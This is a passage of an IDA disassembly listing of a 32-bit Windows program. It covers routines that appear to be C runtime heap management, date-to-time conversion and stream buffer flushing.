; sub_4030DF+1B6�j
mov eax, [ebp+var_10]
mov [edx], ebx
mov [ebx+edx-4], ebx
dec dword ptr [eax]
jnz loc_403405
mov eax, dword_518610
test eax, eax
jz loc_4033F7
mov ecx, dword_518608
mov edi, dword_4080A8
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call edi
mov ecx, dword_518608
mov eax, dword_518610
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_518610
mov ecx, dword_518608
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_518610
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_518610
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_403385
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_518610
loc_403385: ; CODE XREF: sub_4030DF+29B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_4033F7
push ebx
push 0
push dword ptr [eax+0Ch]
call edi
mov eax, dword_518610
push dword ptr [eax+10h]
push 0
push dword_51861C
call dword_408088
mov eax, dword_518614
mov edx, dword_518618
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_518610
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_404F90
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_518614
cmp eax, dword_518610
jbe short loc_4033E9
sub eax, 14h
loc_4033E9: ; CODE XREF: sub_4030DF+305�j
mov ecx, dword_518618
mov dword_51860C, ecx
jmp short loc_4033FA
; ---------------------------------------------------------------------------
loc_4033F7: ; CODE XREF: sub_4030DF+233�j
; sub_4030DF+2AA�j
mov eax, [ebp+arg_0]
loc_4033FA: ; CODE XREF: sub_4030DF+316�j
mov dword_518610, eax
mov dword_518608, esi
loc_403405: ; CODE XREF: sub_4030DF+226�j
pop edi
pop esi
pop ebx
leave
retn
sub_4030DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40340A proc near ; CODE XREF: sub_402904+E�p
; sub_406A9F+30�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_518614
mov edx, dword_518618
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_40344A
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_40345A
; ---------------------------------------------------------------------------
loc_40344A: ; CODE XREF: sub_40340A+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_40345A: ; CODE XREF: sub_40340A+3E�j
mov eax, dword_51860C
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_403481
loc_403468: ; CODE XREF: sub_40340A+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_403481
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_403468
loc_403481: ; CODE XREF: sub_40340A+5C�j
; sub_40340A+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_4034FF
mov ebx, edx
loc_403488: ; CODE XREF: sub_40340A+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_4034A4
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_4034A2
add ebx, 14h
jmp short loc_403488
; ---------------------------------------------------------------------------
loc_4034A2: ; CODE XREF: sub_40340A+91�j
cmp ebx, eax
loc_4034A4: ; CODE XREF: sub_40340A+83�j
jnz short loc_4034FF
loc_4034A6: ; CODE XREF: sub_40340A+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_4034BC
cmp dword ptr [ebx+8], 0
jnz short loc_4034B9
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_4034A6
; ---------------------------------------------------------------------------
loc_4034B9: ; CODE XREF: sub_40340A+A5�j
cmp ebx, [ebp+var_4]
loc_4034BC: ; CODE XREF: sub_40340A+9F�j
jnz short loc_4034E4
mov ebx, edx
loc_4034C0: ; CODE XREF: sub_40340A+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_4034D4
cmp dword ptr [ebx+8], 0
jnz short loc_4034D2
add ebx, 14h
jmp short loc_4034C0
; ---------------------------------------------------------------------------
loc_4034D2: ; CODE XREF: sub_40340A+C1�j
cmp ebx, eax
loc_4034D4: ; CODE XREF: sub_40340A+BB�j
jnz short loc_4034E4
call sub_403713
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_4034F8
loc_4034E4: ; CODE XREF: sub_40340A:loc_4034BC�j
; sub_40340A:loc_4034D4�j
push ebx
call sub_4037C4
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_4034FF
loc_4034F8: ; CODE XREF: sub_40340A+D8�j
xor eax, eax
jmp loc_40370E
; ---------------------------------------------------------------------------
loc_4034FF: ; CODE XREF: sub_40340A+7A�j
; sub_40340A:loc_4034A4�j ...
mov dword_51860C, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_403526
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_40355D
loc_403526: ; CODE XREF: sub_40340A+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_40355A
loc_403543: ; CODE XREF: sub_40340A+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_403543
loc_40355A: ; CODE XREF: sub_40340A+137�j
mov edx, [ebp+var_4]
loc_40355D: ; CODE XREF: sub_40340A+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_403586
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_403586: ; CODE XREF: sub_40340A+16D�j
; sub_40340A+183�j
test ecx, ecx
jl short loc_40358F
shl ecx, 1
inc edi
jmp short loc_403586
; ---------------------------------------------------------------------------
loc_40358F: ; CODE XREF: sub_40340A+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_4035AC
push 3Fh
pop esi
loc_4035AC: ; CODE XREF: sub_40340A+19D�j
cmp esi, edi
jz loc_4036C1
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_40361D
cmp edi, 20h
jge short loc_4035EC
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_40361A
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_40361D
; ---------------------------------------------------------------------------
loc_4035EC: ; CODE XREF: sub_40340A+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_40361A
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_40361D
; ---------------------------------------------------------------------------
loc_40361A: ; CODE XREF: sub_40340A+1D6�j
; sub_40340A+203�j
mov ebx, [ebp+arg_0]
loc_40361D: ; CODE XREF: sub_40340A+1B0�j
; sub_40340A+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_4036CD
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_4036BE
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_40368F
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_40367D
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_40367D: ; CODE XREF: sub_40340A+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_4036BE
; ---------------------------------------------------------------------------
loc_40368F: ; CODE XREF: sub_40340A+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_4036A8
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_4036A8: ; CODE XREF: sub_40340A+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_4036BE: ; CODE XREF: sub_40340A+24E�j
; sub_40340A+283�j
mov ecx, [ebp+var_8]
loc_4036C1: ; CODE XREF: sub_40340A+1A4�j
test ecx, ecx
jz short loc_4036D0
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_4036D0
; ---------------------------------------------------------------------------
loc_4036CD: ; CODE XREF: sub_40340A+229�j
mov ecx, [ebp+var_8]
loc_4036D0: ; CODE XREF: sub_40340A+2B9�j
; sub_40340A+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_403706
cmp ebx, dword_518610
jnz short loc_403706
mov ecx, [ebp+var_4]
cmp ecx, dword_518608
jnz short loc_403706
and dword_518610, 0
loc_403706: ; CODE XREF: sub_40340A+2E0�j
; sub_40340A+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_40370E: ; CODE XREF: sub_40340A+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_40340A endp
; =============== S U B R O U T I N E =======================================
sub_403713 proc near ; CODE XREF: sub_40340A+CC�p
mov eax, dword_518614
mov ecx, dword_518604
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_403756
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_518618
push edi
push dword_51861C
call dword_4080B0
cmp eax, edi
jz short loc_4037A6
add dword_518604, 10h
mov dword_518618, eax
mov eax, dword_518614
loc_403756: ; CODE XREF: sub_403713+11�j
mov ecx, dword_518618
push 41C4h
push 8
lea eax, [eax+eax*4]
push dword_51861C
lea esi, [ecx+eax*4]
call dword_40806C
cmp eax, edi
mov [esi+10h], eax
jz short loc_4037A6
push 4
push 2000h
push 100000h
push edi
call dword_4080AC
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_4037AA
push dword ptr [esi+10h]
push edi
push dword_51861C
call dword_408088
loc_4037A6: ; CODE XREF: sub_403713+30�j
; sub_403713+67�j
xor eax, eax
jmp short loc_4037C1
; ---------------------------------------------------------------------------
loc_4037AA: ; CODE XREF: sub_403713+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_518614
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_4037C1: ; CODE XREF: sub_403713+95�j
pop edi
pop esi
retn
sub_403713 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4037C4 proc near ; CODE XREF: sub_40340A+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_4037D6: ; CODE XREF: sub_4037C4+19�j
test eax, eax
jl short loc_4037DF
shl eax, 1
inc ebx
jmp short loc_4037D6
; ---------------------------------------------------------------------------
loc_4037DF: ; CODE XREF: sub_4037C4+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_4037F4: ; CODE XREF: sub_4037C4+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_4037F4
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call dword_4080AC
test eax, eax
jnz short loc_403827
or eax, 0FFFFFFFFh
jmp loc_4038BA
; ---------------------------------------------------------------------------
loc_403827: ; CODE XREF: sub_4037C4+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_40386D
lea eax, [edi+10h]
loc_403834: ; CODE XREF: sub_4037C4+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_403834
loc_40386D: ; CODE XREF: sub_4037C4+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_4038AA
or [eax+4], edi
loc_4038AA: ; CODE XREF: sub_4037C4+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_4038BA: ; CODE XREF: sub_4037C4+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_4037C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038BF proc near ; CODE XREF: sub_407632+58�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
mov edx, edi
lea esi, [eax+17h]
sub edx, [ecx+0Ch]
mov eax, [ecx+10h]
and esi, 0FFFFFFF0h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
dec ecx
cmp esi, ecx
mov [ebp+arg_8], ecx
mov ebx, [ecx+edi-4]
lea edi, [ecx+edi-4]
mov [ebp+var_4], ebx
jle loc_403A6D
test bl, 1
jnz loc_403A66
add ebx, ecx
cmp esi, ebx
jg loc_403A66
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_403936
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_403936: ; CODE XREF: sub_4038BF+6F�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_403986
cmp ecx, 20h
jnb short loc_403962
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_403986
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_403986
; ---------------------------------------------------------------------------
loc_403962: ; CODE XREF: sub_4038BF+82�j
add ecx, 0FFFFFFE0h
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_403986
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_403986: ; CODE XREF: sub_4038BF+7D�j
; sub_4038BF+9A�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_403A54
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
lea ecx, [ecx+esi-4]
cmp edi, 3Fh
jbe short loc_4039C0
push 3Fh
pop edi
loc_4039C0: ; CODE XREF: sub_4038BF+FC�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_403A42
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_8+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_403A19
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_403A0C
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_403A0C: ; CODE XREF: sub_4038BF+13D�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, edi
jmp short loc_403A3E
; ---------------------------------------------------------------------------
loc_403A19: ; CODE XREF: sub_4038BF+137�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_403A2F
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_403A2F: ; CODE XREF: sub_4038BF+15E�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
mov edx, 80000000h
loc_403A3E: ; CODE XREF: sub_4038BF+158�j
shr edx, cl
or [eax], edx
loc_403A42: ; CODE XREF: sub_4038BF+125�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_403A57
; ---------------------------------------------------------------------------
loc_403A54: ; CODE XREF: sub_4038BF+E5�j
mov edx, [ebp+arg_4]
loc_403A57: ; CODE XREF: sub_4038BF+193�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_403BAD
; ---------------------------------------------------------------------------
loc_403A66: ; CODE XREF: sub_4038BF+52�j
; sub_4038BF+5C�j
xor eax, eax
jmp loc_403BB0
; ---------------------------------------------------------------------------
loc_403A6D: ; CODE XREF: sub_4038BF+49�j
jge loc_403BAD
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
mov [ebp+arg_4], ebx
sar esi, 4
dec esi
mov [ebx-4], ecx
cmp esi, 3Fh
jbe short loc_403A98
push 3Fh
pop esi
loc_403A98: ; CODE XREF: sub_4038BF+1D4�j
test byte ptr [ebp+var_4], 1
jnz loc_403B27
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_403AB1
push 3Fh
pop esi
loc_403AB1: ; CODE XREF: sub_4038BF+1ED�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_403B00
cmp esi, 20h
jnb short loc_403ADC
mov ebx, 80000000h
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_403AFD
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_403AFD
; ---------------------------------------------------------------------------
loc_403ADC: ; CODE XREF: sub_4038BF+1FD�j
lea ecx, [esi-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_403AFD
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_403AFD: ; CODE XREF: sub_4038BF+214�j
; sub_4038BF+21B�j ...
mov ebx, [ebp+arg_4]
loc_403B00: ; CODE XREF: sub_4038BF+1F8�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov ecx, [edi+4]
mov esi, [edi+8]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_403B27
push 3Fh
pop esi
loc_403B27: ; CODE XREF: sub_4038BF+1DD�j
; sub_4038BF+263�j
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [ebx+4], edi
mov [ebx+8], ecx
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_403BA4
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [esi+eax+4], cl
jnb short loc_403B7B
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_403B6E
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_403B6E: ; CODE XREF: sub_4038BF+29F�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, esi
jmp short loc_403BA0
; ---------------------------------------------------------------------------
loc_403B7B: ; CODE XREF: sub_4038BF+299�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_403B91
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_403B91: ; CODE XREF: sub_4038BF+2C0�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
mov edx, 80000000h
loc_403BA0: ; CODE XREF: sub_4038BF+2BA�j
shr edx, cl
or [eax], edx
loc_403BA4: ; CODE XREF: sub_4038BF+287�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_403BAD: ; CODE XREF: sub_4038BF+1A2�j
; sub_4038BF:loc_403A6D�j
push 1
pop eax
loc_403BB0: ; CODE XREF: sub_4038BF+1A9�j
pop edi
pop esi
pop ebx
leave
retn
sub_4038BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BB5 proc near ; CODE XREF: sub_402A3C+C9�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_0]
sub ebx, 76Ch
cmp ebx, 46h
jl loc_403C71
cmp ebx, 8Ah
jg loc_403C71
push esi
push edi
mov edi, [ebp+arg_4]
mov esi, dword_409524[edi*4]
add esi, [ebp+arg_8]
test bl, 3
jnz short loc_403BF4
cmp edi, 2
jle short loc_403BF4
inc esi
loc_403BF4: ; CODE XREF: sub_403BB5+37�j
; sub_403BB5+3C�j
call sub_4052C5
mov eax, ebx
lea ecx, [ebx-1]
imul eax, 16Dh
sar ecx, 2
mov edx, esi
mov [ebp+var_8], esi
add edx, ecx
mov [ebp+var_10], ebx
add eax, edx
mov edx, [ebp+arg_14]
lea ecx, [eax+eax*2]
mov eax, [ebp+arg_C]
mov [ebp+var_1C], eax
lea ecx, [eax+ecx*8]
imul ecx, 3Ch
add ecx, [ebp+arg_10]
imul ecx, 3Ch
add ecx, dword_409440
dec edi
cmp [ebp+arg_18], 1
mov [ebp+var_14], edi
pop edi
pop esi
lea ecx, [ecx+edx+7C558180h]
mov [ebp+arg_0], ecx
jz short loc_403C67
cmp [ebp+arg_18], 0FFFFFFFFh
jnz short loc_403C6D
cmp dword_409444, 0
jz short loc_403C6D
lea eax, [ebp+var_24]
push eax
call sub_405538
pop ecx
mov ecx, [ebp+arg_0]
test eax, eax
jz short loc_403C6D
loc_403C67: ; CODE XREF: sub_403BB5+90�j
add ecx, dword_409448
loc_403C6D: ; CODE XREF: sub_403BB5+96�j
; sub_403BB5+9F�j ...
mov eax, ecx
jmp short loc_403C74
; ---------------------------------------------------------------------------
loc_403C71: ; CODE XREF: sub_403BB5+13�j
; sub_403BB5+1F�j
or eax, 0FFFFFFFFh
loc_403C74: ; CODE XREF: sub_403BB5+BA�j
pop ebx
leave
retn
sub_403BB5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403C77 proc near ; CODE XREF: sub_402B47+44�p
; sub_402B97+46�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
mov ebx, [esi+10h]
test al, 82h
jz loc_403D80
test al, 40h
jnz loc_403D80
test al, 1
jz short loc_403CAF
and dword ptr [esi+4], 0
test al, 10h
jz loc_403D80
mov ecx, [esi+8]
and al, 0FEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_403CAF: ; CODE XREF: sub_403C77+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and al, 0EFh
or al, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_403CE9
cmp esi, offset dword_409580
jz short loc_403CD7
cmp esi, offset dword_4095A0
jnz short loc_403CE2
loc_403CD7: ; CODE XREF: sub_403C77+56�j
push ebx
call sub_405AAF
test eax, eax
pop ecx
jnz short loc_403CE9
loc_403CE2: ; CODE XREF: sub_403C77+5E�j
push esi
call sub_405A6B
pop ecx
loc_403CE9: ; CODE XREF: sub_403C77+4E�j
; sub_403C77+69�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_403D56
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_403D19
push edi
push eax
push ebx
call sub_4058BE
add esp, 0Ch
mov [ebp+arg_4], eax
jmp short loc_403D4C
; ---------------------------------------------------------------------------
loc_403D19: ; CODE XREF: sub_403C77+90�j
cmp ebx, 0FFFFFFFFh
jz short loc_403D34
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, dword_518500[eax*4]
lea eax, [eax+ecx*8]
jmp short loc_403D39
; ---------------------------------------------------------------------------
loc_403D34: ; CODE XREF: sub_403C77+A5�j
mov eax, offset dword_4093A8
loc_403D39: ; CODE XREF: sub_403C77+BB�j
test byte ptr [eax+4], 20h
jz short loc_403D4C
push 2
push 0
push ebx
call sub_405824
add esp, 0Ch
loc_403D4C: ; CODE XREF: sub_403C77+A0�j
; sub_403C77+C6�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_403D6A
; ---------------------------------------------------------------------------
loc_403D56: ; CODE XREF: sub_403C77+79�j
push 1
lea eax, [ebp+arg_0]
pop edi
push edi
push eax
push ebx
call sub_4058BE
add esp, 0Ch
mov [ebp+arg_4], eax
loc_403D6A: ; CODE XREF: sub_403C77+DD�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_403D76
or dword ptr [esi+0Ch], 20h
jmp short loc_403D85
; ---------------------------------------------------------------------------
loc_403D76: ; CODE XREF: sub_403C77+F7�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_403D88
; ---------------------------------------------------------------------------
loc_403D80: ; CODE XREF: sub_403C77+10�j
; sub_403C77+18�j ...
or al, 20h
mov [esi+0Ch], eax
loc_403D85: ; CODE XREF: sub_403C77+FD�j
or eax, 0FFFFFFFFh
loc_403D88: ; CODE XREF: sub_403C77+107�j
pop esi
pop ebx
pop ebp
retn
sub_403C77 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403D8C proc near ; CODE XREF: sub_402B47+27�p
; sub_402B97+29�p
var_248 = byte ptr -248h
var_247 = byte ptr -247h
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
